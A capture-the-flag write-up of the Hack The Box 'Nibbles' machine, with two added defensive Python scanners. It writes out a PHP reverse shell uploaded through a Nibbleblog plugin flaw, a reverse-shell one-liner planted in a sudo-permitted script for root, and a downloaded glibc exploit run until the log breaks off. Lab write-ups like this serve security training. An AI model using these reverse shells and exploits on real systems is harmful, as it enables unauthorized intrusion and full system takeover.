Nibbles
Port scan
masscan
root@kali:~/HTB/Machines/Nibbles# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.75 --rate=1000
Starting masscan 1.0.5 at 2019-11-26 14:25:41 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.75
Discovered open port 22/tcp on 10.10.10.75
nmap
root@kali:~/HTB/Machines/Nibbles# nmap -A -T4 -v 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 23:13 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Initiating Ping Scan at 23:13
Scanning 10.10.10.75 [4 ports]
Completed Ping Scan at 23:13, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:13
Scanning nibbles.htb (10.10.10.75) [1000 ports]
Discovered open port 22/tcp on 10.10.10.75
Discovered open port 80/tcp on 10.10.10.75
Completed SYN Stealth Scan at 23:13, 0.68s elapsed (1000 total ports)
Initiating Service scan at 23:13
Scanning 2 services on nibbles.htb (10.10.10.75)
Completed Service scan at 23:13, 6.10s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against nibbles.htb (10.10.10.75)
adjust_timeouts2: packet supposedly had rtt of -942494 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -942494 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1137146 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1137146 microseconds. Ignoring time.
Retrying OS detection (try #2) against nibbles.htb (10.10.10.75)
Retrying OS detection (try #3) against nibbles.htb (10.10.10.75)
adjust_timeouts2: packet supposedly had rtt of -750731 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -750731 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -560377 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -560377 microseconds. Ignoring time.
Retrying OS detection (try #4) against nibbles.htb (10.10.10.75)
Retrying OS detection (try #5) against nibbles.htb (10.10.10.75)
adjust_timeouts2: packet supposedly had rtt of -258685 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258685 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258563 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258563 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -257913 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -257913 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -508716 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -508716 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -508817 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -508817 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -784778 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -784778 microseconds. Ignoring time.
Initiating Traceroute at 23:13
Completed Traceroute at 23:13, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 23:13
Completed Parallel DNS resolution of 2 hosts. at 23:13, 0.21s elapsed
NSE: Script scanning 10.10.10.75.
Initiating NSE at 23:13
Completed NSE at 23:13, 1.50s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.17s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Nmap scan report for nibbles.htb (10.10.10.75)
Host is up (0.045s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/25%OT=22%CT=1%CU=43620%PV=Y%DS=2%DC=T%G=Y%TM=5DDCA6
OS:79%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=I%TS=8)SEQ(SP=
OS:FC%GCD=1%ISR=105%TI=Z%TS=9)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=8)
OS:OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54D
OS:ST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
OS:ECN(R=Y%DF=Y%TG=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)ECN(R=Y%DF=Y%T=40%W=7210%
OS:O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)T1(R=Y%DF=Y
OS:%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=O%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T
OS:G=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=O%F=AR%O=%R
OS:D=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0
OS:%S=O%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T
OS:7(R=Y%DF=Y%T=40%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T=40%IPL=
OS:164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%TG=40%CD=S)IE(R=
OS:Y%DFI=N%T=40%CD=S)

Uptime guess: 49.710 days (since Mon Oct  7 07:11:16 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT      ADDRESS
1   42.81 ms 10.10.14.1
2   42.90 ms nibbles.htb (10.10.10.75)

NSE: Script Post-scanning.
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.19 seconds
           Raw packets sent: 1255 (67.442KB) | Rcvd: 4498 (186.062KB)
Web Enumeration
root@kali:~/HTB/Machines/Nibbles# curl http://10.10.10.75
Hello world!
<!-- /nibbleblog/ directory. Nothing interesting here! -->
The first page doesn't provide much information, but an HTML comment tells us to take a look at the /nibbleblog/ directory.
In that directory, we find a blog powered by Nibbleblog.
Dirsearch
root@kali:~/HTB/Machines/Nibbles# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 1000 -u http://10.10.10.75/nibbleblog/
  _|. _ _  _  _  _ _|_    v0.3.8
 (_||| _) (/_(_|| (_| )
Extensions: php, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-25_23-21-22.log
Target: http://10.10.10.75/nibbleblog/
[23:21:22] Starting:
[23:21:23] 403 -  301B - /nibbleblog/.php
[23:21:24] 200 -    4KB - /nibbleblog/plugins/
[23:21:26] 200 -   78B - /nibbleblog/install.php
[23:21:26] 200 -    2KB - /nibbleblog/update.php
[23:21:26] 200 -  401B - /nibbleblog/sitemap.php
[23:21:26] 200 -    3KB - /nibbleblog/languages/
[23:21:28] 200 -    2KB - /nibbleblog/admin/
[23:21:28] 200 -    3KB - /nibbleblog/index.php
[23:21:28] 200 -    1KB - /nibbleblog/content/
[23:21:29] 200 -  300B - /nibbleblog/feed.php
[23:21:30] 200 -    1KB - /nibbleblog/admin.php
[23:21:32] 200 -    2KB - /nibbleblog/themes/
[23:21:35] 200 -   34KB - /nibbleblog/LICENSE.txt
[23:22:35] 200 -    1KB - /nibbleblog/COPYRIGHT.txt
Task Completed
Dirbuster
With DirBuster, we can enumerate a lot of files.
Exploit search
root@kali:~/HTB/Machines/Nibbles# searchsploit nibble
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Nibbleblog 3 - Multiple SQL Injections | exploits/php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Uplo | exploits/php/remote/38489.rb
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
The file upload looks very interesting. There is a Metasploit module, but the write-up of the bug by Tim Coen of Curesec GmbH is even better, and we can exploit the machine manually. However, we need valid credentials to log in to the application.
Web access
With DirBuster, we can find an interesting file: /nibbleblog/content/private/users.xml
But this file only reveals the username, admin.
There is a blacklist protection, so we cannot brute-force the admin login page. The only way is to guess the password. In this case the credentials admin/nibbles work.
Gain shell access to the server
On his page, Tim explains how to upload a PHP file to the server and execute it afterwards. The exploit consists of uploading a PHP reverse shell and gaining access to the server.
Open listener
root@kali:~/HTB/Machines/Nibbles# rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Create the reverse shell file
root@kali:~/HTB/Machines/Nibbles# cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php
root@kali:~/HTB/Machines/Nibbles# vi rs.php
root@kali:~/HTB/Machines/Nibbles# grep CHANGE rs.php
$ip = '10.10.14.34';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
Upload the reverse shell file
Run the reverse shell
Browse to folder /nibbleblog/content/private/plugins/my_image
To trigger the reverse shell, click on the link or issue a cURL request.
root@kali:~/HTB/Machines/Nibbles# curl http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
The reverse shell is open.
root@kali:~/HTB/Machines/Nibbles# rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.75.
Ncat: Connection from 10.10.10.75:50112.
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 11:31:07 up  2:07,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler
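A defender's counterpart to the upload step above, added here and not part of the original write-up or of Nibbleblog: a scanner that walks a plugin upload folder such as content/private/plugins/my_image and flags server-side scripts, and image-named files whose bytes are not an image or that contain a PHP tag. The directory layout and the sample files it creates are constructed for the demonstration.

```python
"""Scan an upload directory for server-side scripts hiding among images.

Added example, not from the write-up: the Nibbleblog my_image plugin stored
an uploaded PHP file under content/private/plugins/my_image/ and the web
server executed it. A periodic scan of such folders catches that pattern."""
import os
import re
import tempfile
from typing import Dict, List

SCRIPT_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}
IMAGE_MAGIC: Dict[str, bytes] = {  # bytes an honest image of that type starts with
    ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8",
}
PHP_TAG = re.compile(rb"<\?(?:php|=)")  # long and short PHP open tags

def classify(path: str) -> List[str]:
    """Return the reasons `path` is suspicious (empty list if it looks clean)."""
    reasons = []
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        head = fh.read(64 * 1024)  # enough for magic bytes and an embedded <?php
    if ext in SCRIPT_EXTS:
        reasons.append(f"script extension {ext} inside an upload directory")
    magic = IMAGE_MAGIC.get(ext)
    if magic and not head.startswith(magic):
        reasons.append(f"{ext} file does not start with the {ext} magic bytes")
    if PHP_TAG.search(head):
        reasons.append("contains a PHP open tag")
    return reasons

def scan_upload_dir(root: str) -> Dict[str, List[str]]:
    """Map every suspicious file under `root` (relative path) to its reasons."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            reasons = classify(full)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings

def build_demo_dir() -> str:
    """Create a constructed sample tree mimicking the plugin upload folder."""
    root = tempfile.mkdtemp(prefix="nibbleblog_")
    os.makedirs(os.path.join(root, "my_image"))
    samples = {
        "my_image/image.php": b"<?php echo 'script, not an image'; ?>",
        "my_image/photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 32,
        "my_image/avatar.png": b"<?php echo 'php behind a png name'; ?>",
        "my_image/logo.gif": b"GIF89a" + b"\x00" * 16,
    }
    for rel, data in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root

if __name__ == "__main__":
    for rel, why in scan_upload_dir(build_demo_dir()).items():
        print(f"{rel}: {'; '.join(why)}")
```

Expected on the constructed tree: image.php and avatar.png are reported, photo.jpg and logo.gif are not.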
User flag
$ cat /home/nibbler/user.txt
<USER_FLAG>
Privilege escalation
On the first check, we can see that the user nibbler can execute a specific file as root.
$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
The file doesn't exist, but its path is inside nibbler's home directory, so we can create it ourselves.
$ ls -l /home/nibbler/personal/stuff/monitor.sh
ls: cannot access '/home/nibbler/personal/stuff/monitor.sh': No such file or directory
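As an added example (not from the original write-up), a small audit of the sudo configuration just shown: it parses the text printed by sudo -l and flags rules whose command is missing while the user can write to its nearest existing parent directory, or whose command file is itself writable by the user. The embedded sample is a constructed copy of the rule above.

```python
"""Audit `sudo -l` output for commands the unprivileged user could replace.

Added example, not part of the write-up: flags rules whose command is missing
while its nearest existing parent is writable by the user (the Nibbles case),
or whose command file is itself writable by the user."""
import os
import re
import stat
from dataclasses import dataclass
from typing import List, Optional

# Constructed copy of the sudo -l output shown in the write-up.
SAMPLE_SUDO_L = r"""sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# "(runas) TAG: /path args, /other" -> runas, tags, comma-separated commands
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>/.*)$")

@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    command: str  # absolute path, arguments dropped

def parse_sudo_l(text: str) -> List[SudoRule]:
    """Collect the command rules that follow the 'may run the following' line."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        for entry in m.group("cmds").split(","):
            parts = entry.split()
            if parts and parts[0].startswith("/"):
                rules.append(SudoRule(m.group("runas").strip(),
                                      "NOPASSWD:" in m.group("tags"), parts[0]))
    return rules

def writable_by(path: str, uid: int, gid: int) -> bool:
    """Owner (who can chmod at will), group-writable for gid, or world-writable."""
    st = os.stat(path)
    if st.st_uid == uid:
        return True
    return bool((st.st_gid == gid and st.st_mode & stat.S_IWGRP) or st.st_mode & stat.S_IWOTH)

def nearest_existing(path: str) -> str:
    """Walk up from a missing path to the first component that exists."""
    while not os.path.exists(path) and os.path.dirname(path) != path:
        path = os.path.dirname(path)
    return path

def audit_rule(rule: SudoRule, uid: int, gid: int) -> Optional[str]:
    """One finding, or None when the delegated command cannot be swapped by uid."""
    cmd = rule.command
    if not os.path.exists(cmd):
        anchor = nearest_existing(cmd)
        if writable_by(anchor, uid, gid):
            return (f"CRITICAL {cmd}: does not exist and {anchor} is writable by uid {uid}; "
                    f"the user can plant a command that runs as {rule.runas}")
        return f"WARN {cmd}: command does not exist"
    if writable_by(cmd, uid, gid):
        return f"CRITICAL {cmd}: command file is writable by uid {uid}"
    return None

def audit_sudo_l(text: str, uid: int, gid: int) -> List[str]:
    return [f for f in (audit_rule(r, uid, gid) for r in parse_sudo_l(text)) if f]

if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE_SUDO_L, os.getuid(), os.getgid()):
        print(finding)
```

Run on the target as the rule's user, the sample text would be replaced by the live output of sudo -l.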
Open listener
root@kali:~/HTB/Machines/Nibbles# rlwrap nc -nvlp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Create script file
We create a script file that opens a reverse shell.
$ mkdir -p /home/nibbler/personal/stuff/
$ echo "php -r '\$sock=fsockopen(\"10.10.14.34\",5555);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" > /home/nibbler/personal/stuff/monitor.sh
$ chmod +x /home/nibbler/personal/stuff/monitor.sh
$ cat /home/nibbler/personal/stuff/monitor.sh
php -r '$sock=fsockopen("10.10.14.34",5555);exec("/bin/sh -i <&3 >&3 2>&3");'
Run script
$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
On the listener
root@kali:~/HTB/Machines/Nibbles# rlwrap nc -nvlp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.75.
Ncat: Connection from 10.10.10.75:50154.
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
Privilege escalation (easier alternative way)
On the first check, we can see that the user nibbler can execute a specific file as root.
$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
The file doesn't exist, but its path is inside nibbler's home directory, so we can create it ourselves.
$ ls -l /home/nibbler/personal/stuff/monitor.sh
ls: cannot access '/home/nibbler/personal/stuff/monitor.sh': No such file or directory
Create script file
We create a script file that opens a reverse shell.
$ mkdir -p /home/nibbler/personal/stuff/
$ echo "bash" > /home/nibbler/personal/stuff/monitor.sh
$ chmod +x /home/nibbler/personal/stuff/monitor.sh
$ cat /home/nibbler/personal/stuff/monitor.sh
bash
Run script
$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
whoami
root
Privilege escalation (harder alternative way)
We can try to find a local exploit on the machine.
Upload LES (Linux exploit suggester script)
root@kali:~/HTB/Machines/Nibbles# cp ../../Utils/linux-exploit-suggester/linux-exploit-suggester.sh ./
root@kali:~/HTB/Machines/Nibbles# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
From the reverse shell:
$ cd /tmp
$ wget -q http://10.10.14.34/linux-exploit-suggester.sh
$ chmod +x linux-exploit-suggester.sh
Run LES
$ ./linux-exploit-suggester.sh
Available information:
Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
72 kernel space exploits
42 user space exploits
Possible Exploits:
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847.cpp
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-1000112] NETIF_F_UFO

   Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   Exposure: probable
   Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels

[+] [CVE-2016-8655] chocobo_root

   Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
   Download URL: https://www.exploit-db.com/download/40871
   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

[+] [CVE-2016-4557] double-fdput()

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.4.0-(21|38|42|98|140)-generic}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2018-1000001] RationalLove

   Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
   Exposure: less probable
   Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
   Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
   Comments: kernel.unprivileged_userns_clone=1 required

[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64

   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root binaries

[+] [CVE-2017-1000253] PIE_stack_corruption

   Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
   Exposure: less probable
   Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
   Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c

[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE

   Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
   Exposure: less probable
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
   Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only

[+] [CVE-2016-2384] usb-midi

   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [CVE-2016-0728] keyring

   Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/40003
   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
Check requisites
$ lsb_release -a
Distributor ID: Ubuntu
Description: Ubuntu 16.04.3 LTS
Release: 16.04
Codename: xenial
No LSB modules are available.
The OS version matches (Ubuntu 16.04.3).
$ ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu9) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
The glibc version matches too (2.23-0ubuntu9).
Transfer the exploit
root@kali:~/HTB/Machines/Nibbles# wget -q https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
Check that our web server is still up.
root@kali:~/HTB/Machines/Nibbles# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.75 - - [27/Nov/2019 07:57:53] "GET /linux-exploit-suggester.sh HTTP/1.1" 200 -
Download the file on the target
$ wget -q http://10.10.14.34/RationalLove.c
Compile the exploit
Compile the exploit on the target.
$ gcc -o RationalLove RationalLove.c
Run the exploit
$ ./RationalLove
./RationalLove: setting up environment ...
Detected OS version: "16.04.3 LTS (Xenial Xerus)"
./RationalLove: using umount at "/bin/umount".
No pid supplied via command line, trying to create a namespace
CAVEAT: /proc/sys/kernel/unprivileged_userns_clone must be 1 on systems with USERNS protection.
Namespaced filesystem created with pid 22110
Attempting to gain root, try 1 of 10 ...
Starting subprocess
Stack content received, calculating next phase
Found source address location 0x7ffe7d16eda8 pointing to target address 0x7ffe7d16ee78 with value 0x7ffe7d171221, libc offset is 0x7ffe7d16ed98
Changing return address from 0x7f7e2aa5e830 to 0x7f7e2aafde00, 0x7f7e2ab0aa20
Using escalation string %69$hn%73$hn%1$10927.10927s%67$hn%1$1.1s%71$hn%1$21710.21710s%68$hn%72$hn%1$10914.10914s%70$hn%1$13280.13280s%66$hn%1$8704.8704s%1$60806.60806s%1$s%1$s%65$hn%1$s%1$s%1$s%1$s%1$s%1$s%1$186.186s%39$hn-%35$lx-%39$lx-%64$lx-%65$lx-%66$lx-%67$lx-%68$lx-%69$lx-%70$lx-%71$lx-%78$s
Attempting to gain root, try 2 of 10 ...
Starting subprocess
Stack content received, calculating next phase
Found source address location 0x7fffb71c8d98 pointing to target address 0x7fffb71c8e68 with value 0x7fffb71ca221, libc offset is 0x7fffb71c8d88
Changing return address from 0x7f059215a830 to 0x7f05921f9e00, 0x7f0592206a20
